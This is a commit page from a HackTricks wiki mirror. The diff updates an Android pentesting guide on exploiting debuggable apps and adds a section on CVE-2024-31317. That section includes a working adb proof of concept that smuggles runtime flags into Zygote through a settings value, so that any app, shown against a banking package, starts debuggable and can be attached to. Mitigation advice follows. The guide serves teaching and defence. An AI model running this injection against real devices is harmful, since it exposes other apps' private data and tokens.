maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1183 from HackTricks-wiki/research_update_src_mobile-pentesting_android-app-pentesting_exploiting-a-debuggeable-applciation_20250725_082659

Browse Source 
Research Update Enhanced src/mobile-pentesting/android-app-p...
This commit is contained in:
SirBroccoli 2025-07-28 18:02:08 +02:00 committed by GitHub
commit 5896a99e66
1 changed files with 40 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
View File

@ -15,7 +15,7 @@ Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass
1. **Decompile the APK:**
- Utilize the APK-GUI tool for decompiling the APK.
- In the _android-manifest_ file, insert `android:debuggable=true` to enable debugging mode.
- In the _android-manifest_ file, insert `android:debuggable="true"` to enable debugging mode.
- Recompile, sign, and zipalign the modified application.
2. **Install the Modified Application:**
@ -30,7 +30,7 @@ Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass
- Command: `adb shell am setup-debug-app w <package_name>`.
- **Note:** This command must be run each time before starting the application to ensure it waits for the debugger.
- For persistence, use `adb shell am setup-debug-app w -persistent <package_name>`.
- For persistence, use `adb shell am setup-debug-app w persistent <package_name>`.
- To remove all flags, use `adb shell am clear-debug-app <package_name>`.
5. **Prepare for Debugging in Android Studio:**
@ -83,12 +83,47 @@ A demonstration was provided using a vulnerable application containing a button
This example demonstrated how the behavior of a debuggable application can be manipulated, highlighting the potential for more complex exploits like gaining shell access on the device in the application's context.
---
# 2024 Turning **any** application into a debuggable process (CVE-2024-31317)
Even if the target APK is _not_ shipped with the `android:debuggable` flag, recent research showed that it is possible to force **arbitrary applications** to start with the `DEBUG_ENABLE_JDWP` runtime flag by abusing the way Zygote parses command-line arguments.
* **Vulnerability:** Improper validation of `--runtime-flags` supplied through Zygotes command socket allows an attacker that can reach `system_server` (for example via the privileged `adb` shell which owns the `WRITE_SECURE_SETTINGS` permission) to inject extra parameters. When the crafted command is replayed by `system_server`, the victim app is forked as _debuggable_ and with a JDWP thread listening. The issue is tracked as **CVE-2024-31317** and was fixed in the June 2024 Android Security Bulletin.
* **Impact:** Full read/write access to the private data directory of **any** app (including privileged ones such as `com.android.settings`), token theft, MDM bypass, and in many cases a direct path to privilege-escalation by abusing exported IPC endpoints of the now-debuggable process.
* **Affected versions:** Android 9 through 14 prior to the June 2024 patch level.
## Quick PoC
```bash
# Requires: adb shell (device must be <2024-06-01 patch-level)
# 1. Inject a fake API-denylist exemption that carries the malicious Zygote flag
adb shell settings put global hidden_api_blacklist_exemptions "--runtime-flags=0x104|Lcom/example/Fake;->entryPoint:"
# 2. Launch the target app it will be forked with DEBUG_ENABLE_JDWP
adb shell monkey -p com.victim.bank 1
# 3. Enumerate JDWP PIDs and attach with jdb / Android-Studio
adb jdwp # obtain the PID
adb forward tcp:8700 jdwp:<pid>
jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8700
```
> The crafted value in step 1 breaks the parser out of the “fast-path” and appends a second synthetic command where `--runtime-flags=0x104` (`DEBUG_ENABLE_JDWP | DEBUG_JNI_DEBUGGABLE`) is accepted as if it had been supplied by the framework. Once the app is spawned, a JDWP socket is opened and regular dynamic-debug tricks (method replacement, variable patching, live Frida injection, etc.) are possible **without modifying the APK or the device boot image**.
## Detection & Mitigation
* Patch to **2024-06-01** (or later) security level Google hardened `ZygoteCommandBuffer` so that subsequent commands cannot be smuggled in this way.
* Restrict `WRITE_SECURE_SETTINGS` / `shell` access on production devices. The exploit requires this permission, which is normally only held by ADB or OEM-privileged apps.
* On EMM/MDM-managed fleets, enforce `ro.debuggable=0` and deny shell via `adb disable-verifier`.
---
## References
- [https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
- [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications)
- [https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html](https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html)
- [https://blog.flanker017.me/cve-2024-31317/](https://blog.flanker017.me/cve-2024-31317/)
{{#include ../../banners/hacktricks-training.md}}